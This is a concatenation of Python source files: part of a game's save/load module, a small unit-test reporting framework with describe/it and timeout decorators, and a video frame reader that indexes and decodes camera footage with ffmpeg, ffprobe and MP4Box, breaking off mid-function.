        }
    return lore
# === CREATE PORTRAIT_DICTIONARY =============================================
def create_portrait_dict():
    """Read GC.PORTRAITDATA xml into {name: {'mouth': [x, y], 'blink': [x, y]}}."""
    portraits = OrderedDict()
    for node in GC.PORTRAITDATA.getroot().findall('portrait'):
        coords = {}
        for feature in ('mouth', 'blink'):
            coords[feature] = [int(c) for c in node.find(feature).text.split(',')]
        portraits[node.get('name')] = coords
    return portraits
# Save IO
def save_io(to_save, to_save_meta, old_slot, slot=None, hard_loc=None):
    """Write the save and meta pickles, plus a per-slot 'Restart' copy.

    hard_loc: fixed file name (used for suspends; no restart copy made).
    slot: numbered save slot. old_slot: slot the game was loaded from --
    'Start' right after a chapter-start save, in which case the new save
    itself becomes the restart point; otherwise the previous slot's restart
    files are carried forward.
    """
    if hard_loc:
        save_loc = 'Saves/' + hard_loc + '.p'
        meta_loc = 'Saves/' + hard_loc + '.pmeta'
    else:
        save_loc = 'Saves/SaveState' + str(slot) + '.p'
        meta_loc = 'Saves/SaveState' + str(slot) + '.pmeta'

    logger.info('Saving to %s', save_loc)
    with open(save_loc, 'wb') as suspendFile:
        pickle.dump(to_save, suspendFile)
    with open(meta_loc, 'wb') as metaFile:
        pickle.dump(to_save_meta, metaFile)

    # For restart
    if not hard_loc: # Hard loc is used for suspend, which doesn't need a restart
        r_save = 'Saves/Restart' + str(slot) + '.p'
        r_save_meta = 'Saves/Restart' + str(slot) + '.pmeta'
        if old_slot == 'Start':
            # fresh chapter save: this save is the restart point
            if save_loc != r_save:
                shutil.copy(save_loc, r_save)
                shutil.copy(meta_loc, r_save_meta)
        else:
            # carry the previous slot's restart point forward
            if 'Saves/Restart' + str(old_slot) + '.p' != r_save:
                shutil.copy('Saves/Restart' + str(old_slot) + '.p', r_save)
                shutil.copy('Saves/Restart' + str(old_slot) + '.pmeta', r_save_meta)
    """
    # Take the temporary file we just created and make it an actual file
    # This is so if the saving fails, we do not lose the old savedata
    if os.path.isfile(save_loc):
        os.remove(save_loc)
        os.rename(save_loc + 'tmp', save_loc) # Put it in permanently
    """
# === SAVE FUNCTION ==========================================================
def suspendGame(gameStateObj, kind, slot=None, hard_loc=None):
    """Serialize the current game state on a background thread.

    kind: 'Start' for a chapter-start save (sweeps the finished level);
    other kinds are mid-level saves/suspends. slot/hard_loc choose the
    output files (see save_io).
    """
    old_slot = gameStateObj.save_slot
    if kind == 'Start':
        gameStateObj.sweep() # This cleans_up, since we're done with level.
        old_slot = 'Start'
    gameStateObj.save_slot = slot
    # gameStateObj.removeSprites()
    to_save, to_save_meta = gameStateObj.save()
    to_save_meta['kind'] = kind
    to_save_meta['name'] = read_overview_file('Data/Level' + str(gameStateObj.counters['level']) + '/overview.txt')['name']
    # deep copies so the background thread doesn't race live game state
    gameStateObj.saving_thread = threading.Thread(target=save_io, args=(copy.deepcopy(to_save), copy.deepcopy(to_save_meta), old_slot, slot, hard_loc))
    gameStateObj.saving_thread.start()
    # gameStateObj.loadSprites()
# === LOAD FUNCTION ===========================================================
"""returns gameStateObj from a suspend"""
def loadGame(gameStateObj, metaDataObj, saveSlot):
    """Rebuild gameStateObj and metaDataObj from the given save slot."""
    gameStateObj.load(saveSlot.loadGame())
    gameStateObj.save_slot = saveSlot.number
    level_folder = 'Data/Level' + str(gameStateObj.counters['level'])
    get_metaDataObj(level_folder, metaDataObj, gameStateObj.metaDataObj_changes)
    gameStateObj.loadSprites()
    # Resume the unique-id counter past every loaded unit's integer id
    int_ids = [unit.id for unit in gameStateObj.allunits if isinstance(unit.id, int)]
    GC.U_ID = max(int_ids) if int_ids else 100
|
test_framework.py | from __future__ import print_function
class AssertException(Exception):
    """Raised when a failed expectation requests a hard stop (allow_raise=True)."""
def format_message(message):
    """Encode newlines so the report protocol stays one line per message."""
    return "<:LF:>".join(message.split("\n"))
def display(type, message, label="", mode=""):
    """Emit one protocol line: <TYPE:MODE:label>message, flushed immediately."""
    header = "\n<{0}:{1}:{2}>".format(type.upper(), mode.upper(), label)
    print(header + format_message(message), flush=True)
def expect(passed=None, message=None, allow_raise=False):
    """Report PASSED when `passed` is truthy; otherwise report FAILED and
    optionally raise AssertException with the failure message."""
    if passed:
        display('PASSED', 'Test Passed')
        return
    message = message or "Value is not what was expected"
    display('FAILED', message)
    if allow_raise:
        raise AssertException(message)
def assert_equals(actual, expected, message=None, allow_raise=False):
    """Pass iff actual == expected; the comparison is appended to any message."""
    detail = "{0} should equal {1}".format(repr(actual), repr(expected))
    message = detail if message is None else message + ": " + detail
    expect(actual == expected, message, allow_raise)
def assert_not_equals(actual, expected, message=None, allow_raise=False):
    """Pass iff actual != expected (via negated ==, matching assert_equals)."""
    detail = "{0} should not equal {1}".format(repr(actual), repr(expected))
    message = detail if message is None else message + ": " + detail
    expect(not (actual == expected), message, allow_raise)
def expect_error(message, function, exception=Exception):
    """Pass iff calling `function` raises `exception` (subclasses count).

    Other Exception subclasses are reported as a failure; BaseException
    subclasses outside Exception propagate.
    """
    try:
        function()
    except exception:
        expect(True, message)
        return
    except Exception as e:
        message = "{}: {} should be {}".format(
            message or "Unexpected exception", repr(e), repr(exception))
    expect(False, message)
def expect_no_error(message, function, exception=BaseException):
    """Pass iff calling `function` raises nothing matching `exception`.

    Raises outside `exception` are swallowed (still a pass), matching the
    original framework's behavior.
    """
    try:
        function()
    except exception as e:
        fail("{}: {}".format(message or "Unexpected exception", repr(e)))
        return
    except:
        pass
    pass_()
def pass_():
    """Record an unconditional pass."""
    expect(True)
def fail(message):
    """Record an unconditional failure carrying `message`."""
    expect(False, message)
def assert_approx_equals(
        actual, expected, margin=1e-9, message=None, allow_raise=False):
    """Pass iff actual is within a combined absolute/relative `margin` of expected."""
    detail = ("{0} should be close to {1} with absolute or relative margin of {2}"
              .format(repr(actual), repr(expected), repr(margin)))
    message = detail if message is None else message + ": " + detail
    # dividing by at least 1 makes the check absolute near zero, relative otherwise
    scale = max(abs(actual), abs(expected), 1)
    expect(abs((actual - expected) / scale) < margin, message, allow_raise)
'''
Usage:
@describe('describe text')
def describe1():
@it('it text')
def it1():
# some test cases...
'''
def _timed_block_factory(opening_text):
    """Build a describe/it-style decorator that times and reports a test block.

    NOTE(review): the returned decorator runs the decorated function
    immediately and returns None, so the decorated name ends up rebound to
    None -- tests execute at definition time by design.
    """
    from timeit import default_timer as timer
    from traceback import format_exception
    from sys import exc_info

    def _timed_block_decorator(s, before=None, after=None):
        # announce the block (e.g. <DESCRIBE::text>) before running it
        display(opening_text, s)

        def wrapper(func):
            if callable(before):
                before()
            time = timer()
            try:
                func()
            except AssertionError as e:
                display('FAILED', str(e))
            except Exception:
                # non-assertion errors get a failure plus a full traceback
                fail('Unexpected exception raised')
                tb_str = ''.join(format_exception(*exc_info()))
                display('ERROR', tb_str)
            display('COMPLETEDIN', '{:.2f}'.format((timer() - time) * 1000))
            if callable(after):
                after()
        return wrapper
    return _timed_block_decorator

describe = _timed_block_factory('DESCRIBE')
it = _timed_block_factory('IT')
'''
Timeout utility
Usage:
@timeout(sec)
def some_tests():
any code block...
Note: Timeout value can be a float.
'''
def timeout(sec):
    """Decorator: run the decorated block in a subprocess, failing it when it
    does not finish within `sec` seconds (float allowed).

    Like @describe/@it, the decorated function runs immediately and the
    decorated name is rebound to None.
    """
    def wrapper(func):
        from multiprocessing import Process
        msg = 'Should not throw any exceptions inside timeout'

        def wrapped():
            expect_no_error(msg, func)
        process = Process(target=wrapped)
        process.start()
        process.join(sec)
        if process.is_alive():
            # still running after the deadline: report and kill it
            fail('Exceeded time limit of {:.3f} seconds'.format(sec))
            process.terminate()
            process.join()
    return wrapper
|
framereader.py | import os
import sys
import glob
import json
import time
import struct
import tempfile
import threading
import xml.etree.ElementTree as ET
import numpy as np
if sys.version_info >= (3,0):
import queue
import pickle
from io import BytesIO as StringIO
else:
import Queue as queue
import cPickle as pickle
from cStringIO import StringIO
import subprocess
from aenum import Enum
from lru import LRU
from functools import wraps
from concurrent.futures import ThreadPoolExecutor, as_completed
from tools.lib.cache import cache_path_for_file_path
from tools.lib.exceptions import DataUnreadableError
try:
from xx.chffr.lib.filereader import FileReader
except ImportError:
from tools.lib.filereader import FileReader
from tools.lib.file_helpers import atomic_write_in_dir
from tools.lib.mkvparse import mkvindex
from tools.lib.route import Route
# Slice-type codes as they appear in the vidindex frame index, per codec.
H264_SLICE_P = 0
H264_SLICE_B = 1
H264_SLICE_I = 2

HEVC_SLICE_B = 0
HEVC_SLICE_P = 1
HEVC_SLICE_I = 2

SLICE_I = 2  # hevc and h264 are the same :)
class FrameType(Enum):
    """Video container/codec kinds recognized by fingerprint_video."""
    raw = 1           # raw bayer camera dump
    h265_stream = 2   # bare hevc Annex-B stream
    h264_mp4 = 3      # h264 in an mp4 container
    h264_pstream = 4  # chffr h264 stream split over contiguous route segments
    ffv1_mkv = 5      # ffv1-in-mkv (predecompressed output)
    ffvhuff_mkv = 6   # ffvhuff-in-mkv
def fingerprint_video(fn):
    """Classify a video file by its first four bytes (and, for Annex-B
    streams, by its file name). Raises DataUnreadableError on empty files
    and NotImplementedError on unknown formats."""
    with FileReader(fn) as f:
        magic = f.read(4)
    if not magic:
        raise DataUnreadableError("%s is empty" % fn)
    if magic == b"\x00\xc0\x12\x00":
        return FrameType.raw
    if magic == b"\x00\x00\x00\x01":
        # Annex-B start code: h264 vs hevc decided by the file name
        if 'hevc' in fn:
            return FrameType.h265_stream
        if os.path.basename(fn) in ("camera", "acamera"):
            return FrameType.h264_pstream
        raise NotImplementedError(fn)
    if magic == b"\x00\x00\x00\x1c":
        return FrameType.h264_mp4
    if magic == b"\x1a\x45\xdf\xa3":
        return FrameType.ffv1_mkv
    raise NotImplementedError(fn)
def ffprobe(fn, fmt=None):
    """Run ffprobe on `fn` and return its parsed JSON stream/format info.

    fmt optionally forces the demuxer. Raises DataUnreadableError when
    ffprobe exits nonzero.
    """
    cmd = ["ffprobe", "-v", "quiet", "-print_format", "json",
           "-show_format", "-show_streams"]
    if fmt:
        cmd.extend(["-format", fmt])
    cmd.append(fn)

    try:
        output = subprocess.check_output(cmd)
    except subprocess.CalledProcessError:
        raise DataUnreadableError(fn)
    return json.loads(output)
def vidindex(fn, typ):
    """Run the bundled `vidindex` helper on `fn` (codec `typ`).

    Returns (index, prefix): index is an (N+1, 2) uint32 array of
    (slice_type, file_offset) rows terminated by a (0xFFFFFFFF, file_size)
    sentinel row; prefix is the stream's global header bytes.
    """
    vidindex_dir = os.path.join(os.path.dirname(os.path.realpath(__file__)), "vidindex")
    vidindex = os.path.join(vidindex_dir, "vidindex")
    # build the helper binary on demand (no-op when already built)
    subprocess.check_call(["make"], cwd=vidindex_dir, stdout=open("/dev/null","w"))

    with tempfile.NamedTemporaryFile() as prefix_f, \
            tempfile.NamedTemporaryFile() as index_f:
        try:
            subprocess.check_call([vidindex, typ, fn, prefix_f.name, index_f.name])
        except subprocess.CalledProcessError as e:
            raise DataUnreadableError("vidindex failed on file %s" % fn)
        with open(index_f.name, "rb") as f:
            index = f.read()
        with open(prefix_f.name, "rb") as f:
            prefix = f.read()

    index = np.frombuffer(index, np.uint32).reshape(-1, 2)

    # sanity-check the sentinel row
    assert index[-1, 0] == 0xFFFFFFFF
    assert index[-1, 1] == os.path.getsize(fn)

    return index, prefix
def cache_fn(func):
    """Decorator: memoize func(fn, ...) results in a pickle next to `fn`.

    The wrapped function grows a `cache_prefix` keyword that selects where
    the cache file lives; a cache hit skips calling `func` entirely.
    """
    @wraps(func)
    def cache_inner(fn, *args, **kwargs):
        prefix = kwargs.pop('cache_prefix', None)
        cache_path = cache_path_for_file_path(fn, prefix)

        if cache_path and os.path.exists(cache_path):
            with open(cache_path, "rb") as f:
                return pickle.load(f)

        value = func(fn, *args, **kwargs)
        if cache_path:
            with atomic_write_in_dir(cache_path, mode="wb", overwrite=True) as f:
                pickle.dump(value, f, -1)
        return value

    return cache_inner
@cache_fn
def index_stream(fn, typ):
    """Index a bare h264/hevc stream: frame index, global prefix, ffprobe info."""
    assert typ in ("hevc", "h264")

    with FileReader(fn) as f:
        assert os.path.exists(f.name), fn
        index, prefix = vidindex(f.name, typ)
        probe = ffprobe(f.name, typ)

    return {'index': index,
            'global_prefix': prefix,
            'probe': probe}
@cache_fn
def index_mp4(fn):
    """Index an h264 mp4 via MP4Box (see vidindex_mp4)."""
    with FileReader(fn) as f:
        local_path = f.name
        return vidindex_mp4(local_path)
@cache_fn
def index_mkv(fn):
    """Index an mkv: ffprobe info plus the codec config record and frame index."""
    with FileReader(fn) as f:
        probe = ffprobe(f.name, "matroska")
        with open(f.name, "rb") as d_f:
            config_record, index = mkvindex.mkvindex(d_f)
    return {'probe': probe,
            'config_record': config_record,
            'index': index}
def index_videos(camera_paths, cache_prefix=None):
    """Requires that paths in camera_paths are contiguous and of the same type."""
    if not camera_paths:
        raise ValueError("must provide at least one video to index")

    frame_type = fingerprint_video(camera_paths[0])
    if frame_type == FrameType.h264_pstream:
        # pstream segments must be indexed together as one route
        index_pstream(camera_paths, "h264", cache_prefix)
        return
    for fn in camera_paths:
        index_video(fn, frame_type, cache_prefix)
def index_video(fn, frame_type=None, cache_prefix=None):
    """Index a single video file, writing a cache next to it (no-op on a hit).

    frame_type is fingerprinted from the file itself when not given.
    """
    cache_path = cache_path_for_file_path(fn, cache_prefix)

    if os.path.exists(cache_path):
        return

    if frame_type is None:
        # fingerprint the path itself; the old code passed fn[0] -- the first
        # *character* of the path -- which could never be a readable file
        frame_type = fingerprint_video(fn)

    if frame_type == FrameType.h264_pstream:
        # hack: try to index the whole route now
        route = Route.from_file_path(fn)
        camera_paths = route.camera_paths()
        if fn not in camera_paths:
            raise DataUnreadableError("Not a contiguous route camera file: {}".format(fn))
        print("no pstream cache for %s, indexing route %s now" % (fn, route.name))
        index_pstream(route.camera_paths(), "h264", cache_prefix)
    elif frame_type == FrameType.h265_stream:
        index_stream(fn, "hevc", cache_prefix=cache_prefix)
    elif frame_type == FrameType.h264_mp4:
        index_mp4(fn, cache_prefix=cache_prefix)
def get_video_index(fn, frame_type, cache_prefix=None):
    """Return the cached index dict for `fn`, indexing it first if needed.

    Returns None when indexing produced no cache for this file.
    """
    cache_path = cache_path_for_file_path(fn, cache_prefix)

    if not os.path.exists(cache_path):
        index_video(fn, frame_type, cache_prefix)
    if not os.path.exists(cache_path):
        return None

    with open(cache_path, "rb") as f:
        return pickle.load(f)
def pstream_predecompress(fns, probe, indexes, global_prefix, cache_prefix, multithreaded=False):
    """Decompress unseekable h264 pstream segments into per-segment ffv1 mkvs.

    The whole route is fed through a single ffmpeg decode; each segment's
    frames are re-encoded losslessly (ffv1, all-intra) so they can be
    random-accessed later. A pickle cache pointing at the mkv is written
    next to each segment. fns/indexes are parallel lists.
    """
    assert len(fns) == len(indexes)
    out_fns = [cache_path_for_file_path(fn, cache_prefix, extension=".predecom.mkv") for fn in fns]
    # list() because this is iterated again in the zip below -- on Python 3 a
    # bare map object would already be exhausted by the all() call
    out_exists = list(map(os.path.exists, out_fns))
    if all(out_exists):
        return

    w = probe['streams'][0]['width']
    h = probe['streams'][0]['height']
    frame_size = w*h*3//2  # yuv420p; // keeps this an int on Python 3

    decompress_proc = subprocess.Popen(
        ["ffmpeg",
         "-threads", "0" if multithreaded else "1",
         "-vsync", "0",
         "-f", "h264",
         "-i", "pipe:0",
         "-threads", "0" if multithreaded else "1",
         "-f", "rawvideo",
         "-pix_fmt", "yuv420p",
         "pipe:1"],
        stdin=subprocess.PIPE, stdout=subprocess.PIPE, stderr=open("/dev/null", "wb"))

    def write_thread():
        # feed every segment into the single decoder, in order
        for fn in fns:
            with FileReader(fn) as f:
                decompress_proc.stdin.write(f.read())
        decompress_proc.stdin.close()

    def read_frame():
        frame = None
        try:
            frame = decompress_proc.stdout.read(frame_size)
        except (IOError, ValueError):
            pass
        # covers read errors (None), EOF and short reads alike
        if frame is None or len(frame) != frame_size:
            raise DataUnreadableError("pre-decompression failed for %s" % fn)
        return frame

    t = threading.Thread(target=write_thread)
    t.daemon = True
    t.start()

    try:
        for fn, out_fn, out_exist, index in zip(fns, out_fns, out_exists, indexes):
            if out_exist:
                # already converted: still must consume this segment's frames
                for fi in range(index.shape[0]-1):
                    read_frame()
                continue

            with atomic_write_in_dir(out_fn, mode="w+b", overwrite=True) as out_tmp:
                compress_proc = subprocess.Popen(
                    ["ffmpeg",
                     "-threads", "0" if multithreaded else "1",
                     "-y",
                     "-vsync", "0",
                     "-f", "rawvideo",
                     "-pix_fmt", "yuv420p",
                     "-s", "%dx%d" % (w, h),
                     "-i", "pipe:0",
                     "-threads", "0" if multithreaded else "1",
                     "-f", "matroska",
                     "-vcodec", "ffv1",
                     "-g", "0",
                     out_tmp.name],
                    stdin=subprocess.PIPE, stderr=open("/dev/null", "wb"))
                try:
                    for fi in range(index.shape[0]-1):
                        compress_proc.stdin.write(read_frame())
                    compress_proc.stdin.close()
                except:
                    compress_proc.kill()
                    raise

                assert compress_proc.wait() == 0

            cache_path = cache_path_for_file_path(fn, cache_prefix)
            with atomic_write_in_dir(cache_path, mode="wb", overwrite=True) as cache_file:
                pickle.dump({
                    'predecom': os.path.basename(out_fn),
                    'index': index,
                    'probe': probe,
                    'global_prefix': global_prefix,
                }, cache_file, -1)
    except:
        decompress_proc.kill()
        raise
    finally:
        t.join()

    rc = decompress_proc.wait()
    if rc != 0:
        raise DataUnreadableError(fns[0])
def index_pstream(fns, typ, cache_prefix=None):
    """Index a contiguous set of chffr h264 pstream segments.

    Each segment gets a pickle cache with its frame index, the stream's
    global prefix, ffprobe info, and the partial-GOP data it needs from the
    previous segment to be decodable on its own. Streams with at most one
    I-frame are unseekable and get pre-decompressed instead.
    """
    if typ != "h264":
        raise NotImplementedError(typ)
    if not fns:
        raise DataUnreadableError("chffr h264 requires contiguous files")

    out_fns = [cache_path_for_file_path(fn, cache_prefix) for fn in fns]
    # list() because this is iterated again in the zip below -- on Python 3 a
    # bare map object would already be exhausted by the all() call
    out_exists = list(map(os.path.exists, out_fns))
    if all(out_exists): return

    # load existing index files to avoid re-doing work
    existing_indexes = []
    for out_fn, exists in zip(out_fns, out_exists):
        existing = None
        if exists:
            with open(out_fn, "rb") as cache_file:
                existing = pickle.load(cache_file)
        existing_indexes.append(existing)

    # probe the first file
    if existing_indexes[0]:
        probe = existing_indexes[0]['probe']
    else:
        with FileReader(fns[0]) as f:
            probe = ffprobe(f.name, typ)

    global_prefix = None

    # get the video index of all the segments in this stream
    indexes = []
    for i, fn in enumerate(fns):
        if existing_indexes[i]:
            index = existing_indexes[i]['index']
            prefix = existing_indexes[i]['global_prefix']
        else:
            with FileReader(fn) as f:
                index, prefix = vidindex(f.name, typ)
        if i == 0:
            # assert prefix
            if not prefix:
                raise DataUnreadableError("vidindex failed for %s" % fn)
            global_prefix = prefix
        indexes.append(index)
    assert global_prefix

    if np.sum(indexes[0][:, 0] == H264_SLICE_I) <= 1:
        print("pstream %s is unseekable. pre-decompressing all the segments..." % (fns[0]))
        pstream_predecompress(fns, probe, indexes, global_prefix, cache_prefix)
        return

    # generate what's required to make each segment self-contained
    # (the partial GOP from the end of each segment is put aside to add
    # to the start of the following segment)
    prefix_data = ["" for _ in fns]
    prefix_index = [[] for _ in fns]
    for i in range(len(fns)-1):
        if indexes[i+1][0, 0] == H264_SLICE_I and indexes[i+1][0, 1] <= 1:
            # next file happens to start with an i-frame; no need for this file's end
            continue

        index = indexes[i]
        if i == 0 and np.sum(index[:, 0] == H264_SLICE_I) <= 1:
            raise NotImplementedError("No I-frames in pstream.")

        # find the last GOP in the index
        frame_b = len(index)-1
        while frame_b > 0 and index[frame_b, 0] != H264_SLICE_I:
            frame_b -= 1
        assert frame_b >= 0
        assert index[frame_b, 0] == H264_SLICE_I

        with FileReader(fns[i]) as vid:
            vid.seek(index[frame_b, 1])
            end_data = vid.read()

        prefix_data[i+1] = end_data
        prefix_index[i+1] = index[frame_b:-1]
        # indexes[i] = index[:frame_b]

    for i, fn in enumerate(fns):
        cache_path = out_fns[i]
        if os.path.exists(cache_path):
            continue
        segment_index = {
            'index': indexes[i],
            'global_prefix': global_prefix,
            'probe': probe,
            'prefix_frame_data': prefix_data[i],      # data to prefix the first GOP with
            'num_prefix_frames': len(prefix_index[i]), # number of frames to skip in the first GOP
        }
        with atomic_write_in_dir(cache_path, mode="wb", overwrite=True) as cache_file:
            pickle.dump(segment_index, cache_file, -1)
def read_file_check_size(f, sz, cookie):
    """Read exactly `sz` bytes from `f` into a fresh buffer, asserting on
    short reads. `cookie` is accepted for interface compatibility and unused."""
    out = bytearray(sz)
    n = f.readinto(out)
    assert n == sz, (n, sz)
    return out
import signal
import ctypes
def _set_pdeathsig(sig=signal.SIGTERM):
def f():
libc = ctypes.CDLL('libc.so.6')
return libc.prctl(1, sig)
return f
def vidindex_mp4(fn):
    """Index an h264 mp4 by parsing MP4Box's -diso xml dump.

    Returns a dict with per-sample offsets/sizes/timestamps (integer ms,
    sorted into PTS order), dependency flags, frame dimensions, and the
    sps/pps parameter sets. Raises DataUnreadableError when MP4Box fails.
    """
    try:
        xmls = subprocess.check_output(["MP4Box", fn, "-diso", "-out", "/dev/stdout"])
    except subprocess.CalledProcessError as e:
        raise DataUnreadableError(fn)

    tree = ET.fromstring(xmls)

    def parse_content(s):
        assert s.startswith("data:application/octet-string,")
        # binascii.unhexlify works on Python 2 and 3 alike
        # (str.decode("hex") existed only on Python 2)
        return binascii.unhexlify(s[len("data:application/octet-string,"):])

    avc_element = tree.find(".//AVCSampleEntryBox")
    width = int(avc_element.attrib['Width'])
    height = int(avc_element.attrib['Height'])

    sps_element = avc_element.find(".//AVCDecoderConfigurationRecord/SequenceParameterSet")
    pps_element = avc_element.find(".//AVCDecoderConfigurationRecord/PictureParameterSet")

    sps = parse_content(sps_element.attrib['content'])
    pps = parse_content(pps_element.attrib['content'])

    media_header = tree.find("MovieBox/TrackBox/MediaBox/MediaHeaderBox")
    time_scale = int(media_header.attrib['TimeScale'])

    sample_sizes = [
        int(entry.attrib['Size']) for entry in tree.findall(
            "MovieBox/TrackBox/MediaBox/MediaInformationBox/SampleTableBox/SampleSizeBox/SampleSizeEntry")
    ]

    sample_dependency = [
        entry.attrib['dependsOnOther'] == "yes" for entry in tree.findall(
            "MovieBox/TrackBox/MediaBox/MediaInformationBox/SampleTableBox/SampleDependencyTypeBox/SampleDependencyEntry")
    ]

    assert len(sample_sizes) == len(sample_dependency)

    chunk_offsets = [
        int(entry.attrib['offset']) for entry in tree.findall(
            "MovieBox/TrackBox/MediaBox/MediaInformationBox/SampleTableBox/ChunkOffsetBox/ChunkEntry")
    ]

    sample_chunk_table = [
        (int(entry.attrib['FirstChunk'])-1, int(entry.attrib['SamplesPerChunk'])) for entry in tree.findall(
            "MovieBox/TrackBox/MediaBox/MediaInformationBox/SampleTableBox/SampleToChunkBox/SampleToChunkEntry")
    ]

    # expand the sample-to-chunk runs into one file offset per sample
    sample_offsets = [None for _ in sample_sizes]
    sample_i = 0
    for i, (first_chunk, samples_per_chunk) in enumerate(sample_chunk_table):
        if i == len(sample_chunk_table)-1:
            last_chunk = len(chunk_offsets)-1
        else:
            last_chunk = sample_chunk_table[i+1][0]-1
        for k in range(first_chunk, last_chunk+1):
            sample_offset = chunk_offsets[k]
            for _ in range(samples_per_chunk):
                sample_offsets[sample_i] = sample_offset
                sample_offset += sample_sizes[sample_i]
                sample_i += 1

    assert sample_i == len(sample_sizes)

    pts_offset_table = [
        ( int(entry.attrib['CompositionOffset']), int(entry.attrib['SampleCount']) ) for entry in tree.findall(
            "MovieBox/TrackBox/MediaBox/MediaInformationBox/SampleTableBox/CompositionOffsetBox/CompositionOffsetEntry")
    ]
    sample_pts_offset = [0 for _ in sample_sizes]
    sample_i = 0
    for dt, count in pts_offset_table:
        for _ in range(count):
            sample_pts_offset[sample_i] = dt
            sample_i += 1

    sample_time_table = [
        ( int(entry.attrib['SampleDelta']), int(entry.attrib['SampleCount']) ) for entry in tree.findall(
            "MovieBox/TrackBox/MediaBox/MediaInformationBox/SampleTableBox/TimeToSampleBox/TimeToSampleEntry")
    ]
    sample_time = [None for _ in sample_sizes]
    cur_ts = 0
    sample_i = 0
    for dt, count in sample_time_table:
        for _ in range(count):
            # // preserves the integer-millisecond timestamps this always
            # produced under Python 2's integer division
            sample_time[sample_i] = (cur_ts + sample_pts_offset[sample_i]) * 1000 // time_scale
            cur_ts += dt
            sample_i += 1

    sample_time.sort() # because we only decode GOPs in PTS order

    return {
        'width': width,
        'height': height,
        'sample_offsets': sample_offsets,
        'sample_sizes': sample_sizes,
        'sample_dependency': sample_dependency,
        'sample_time': sample_time,

        'sps': sps,
        'pps': pps
    }
class BaseFrameReader(object):
    """Common interface for frame readers.

    Subclasses provide: frame_type, frame_count, w, h.
    """

    def __enter__(self):
        return self

    def __exit__(self, *exc_info):
        self.close()

    def close(self):
        # default readers hold no resources
        pass

    def get(self, num, count=1, pix_fmt="yuv420p"):
        """Return `count` frames starting at index `num`; must be overridden."""
        raise NotImplementedError
def FrameReader(fn, cache_prefix=None, readahead=False, readbehind=False, multithreaded=True):
    """Construct the appropriate frame reader for `fn` from its fingerprint."""
    frame_type = fingerprint_video(fn)

    if frame_type == FrameType.raw:
        return RawFrameReader(fn)

    if frame_type in (FrameType.h265_stream, FrameType.h264_pstream):
        index_data = get_video_index(fn, frame_type, cache_prefix)
        if index_data is not None and "predecom" in index_data:
            # already pre-decompressed into an mkv next to the cache file
            cache_path = cache_path_for_file_path(fn, cache_prefix)
            predecom_path = os.path.join(os.path.dirname(cache_path), index_data["predecom"])
            return MKVFrameReader(predecom_path)
        return StreamFrameReader(fn, frame_type, index_data,
                                 readahead=readahead, readbehind=readbehind,
                                 multithreaded=multithreaded)

    if frame_type == FrameType.h264_mp4:
        return MP4FrameReader(fn, readahead=readahead)

    if frame_type == FrameType.ffv1_mkv:
        return MKVFrameReader(fn)

    raise NotImplementedError(frame_type)
def rgb24toyuv420(rgb):
    """Convert an (H, W, 3) rgb24 image to a flat yuv420p byte array.

    H and W must be even (2x2 chroma subsampling). Returns a 1-D uint8
    array of length H*W*3/2 laid out as Y plane, then U, then V.
    """
    yuv_from_rgb = np.array([[ 0.299     ,  0.587     ,  0.114      ],
                             [-0.14714119, -0.28886916,  0.43601035 ],
                             [ 0.61497538, -0.51496512, -0.10001026 ]])
    img = np.dot(rgb.reshape(-1, 3), yuv_from_rgb.T).reshape(rgb.shape)

    y_len = img.shape[0] * img.shape[1]
    # // keeps uv_len an int: Python 3's true division would make the slice
    # indices and np.empty size below floats and fail
    uv_len = y_len // 4

    ys = img[:, :, 0]
    # average each 2x2 chroma block and recenter around 128
    us = (img[::2, ::2, 1] + img[1::2, ::2, 1] + img[::2, 1::2, 1] + img[1::2, 1::2, 1]) / 4 + 128
    vs = (img[::2, ::2, 2] + img[1::2, ::2, 2] + img[::2, 1::2, 2] + img[1::2, 1::2, 2]) / 4 + 128

    yuv420 = np.empty(y_len + 2 * uv_len, dtype=img.dtype)
    yuv420[:y_len] = ys.reshape(-1)
    yuv420[y_len:y_len + uv_len] = us.reshape(-1)
    yuv420[y_len + uv_len:y_len + 2 * uv_len] = vs.reshape(-1)

    return yuv420.clip(0, 255).astype('uint8')
class RawData(object):
    """Random access into a file of fixed-size length-prefixed records.

    Layout: repeated [4-byte native-endian unsigned length][payload]
    records; every record carries the same payload length, taken from the
    first record's header.
    """
    def __init__(self, f):
        # plain open(): the original referenced `_io`, which is never
        # imported in this module (NameError on first use)
        self.f = open(f, 'rb')
        self.lenn = struct.unpack("I", self.f.read(4))[0]
        # // keeps the record count an int on Python 3
        self.count = os.path.getsize(f) // (self.lenn+4)

    def read(self, i):
        """Return the payload bytes of record `i`."""
        self.f.seek((self.lenn+4)*i + 4)
        return self.f.read(self.lenn)
class RawFrameReader(BaseFrameReader):
    """Reader for the raw bayer camera format (debayered to 640x480 rgb)."""

    def __init__(self, fn):
        # raw camera
        self.fn = fn
        self.frame_type = FrameType.raw
        self.rawfile = RawData(self.fn)
        self.frame_count = self.rawfile.count
        self.w, self.h = 640, 480

    def load_and_debayer(self, img):
        """Debayer one 1280x960 raw frame into a 640x480 rgb image."""
        raw = np.frombuffer(img, dtype='uint8').reshape(960, 1280)
        red = raw[0::2, 1::2]
        # green is the mean of the two green sites in each 2x2 bayer cell
        green = ((raw[0::2, 0::2].astype("uint16") +
                  raw[1::2, 1::2].astype("uint16")) >> 1).astype("uint8")
        blue = raw[1::2, 0::2]
        return np.dstack([red, green, blue])

    def get(self, num, count=1, pix_fmt="yuv420p"):
        assert self.frame_count is not None
        assert num + count <= self.frame_count

        if pix_fmt not in ("yuv420p", "rgb24"):
            raise ValueError("Unsupported pixel format %r" % pix_fmt)

        frames = []
        for i in range(num, num + count):
            rgb = self.load_and_debayer(self.rawfile.read(i))
            if pix_fmt == "rgb24":
                frames.append(rgb)
            else:
                frames.append(rgb24toyuv420(rgb))
        return frames
def decompress_video_data(rawdat, vid_fmt, w, h, pix_fmt, multithreaded=False):
    """Decode a whole compressed bitstream `rawdat` with ffmpeg.

    Returns a numpy array of all decoded frames: (N, h, w, 3) for rgb24,
    (N, h*w*3//2) for yuv420p, (N, 3, h, w) for yuv444p.
    Raises DataUnreadableError if ffmpeg exits non-zero.
    """
    # using a tempfile is much faster than proc.communicate for some reason
    with tempfile.TemporaryFile() as tmpf:
        tmpf.write(rawdat)
        tmpf.seek(0)

        proc = subprocess.Popen(
            ["ffmpeg",
             "-threads", "0" if multithreaded else "1",
             "-vsync", "0",
             "-f", vid_fmt,
             "-flags2", "showall",
             "-i", "pipe:0",
             "-threads", "0" if multithreaded else "1",
             "-f", "rawvideo",
             "-pix_fmt", pix_fmt,
             "pipe:1"],
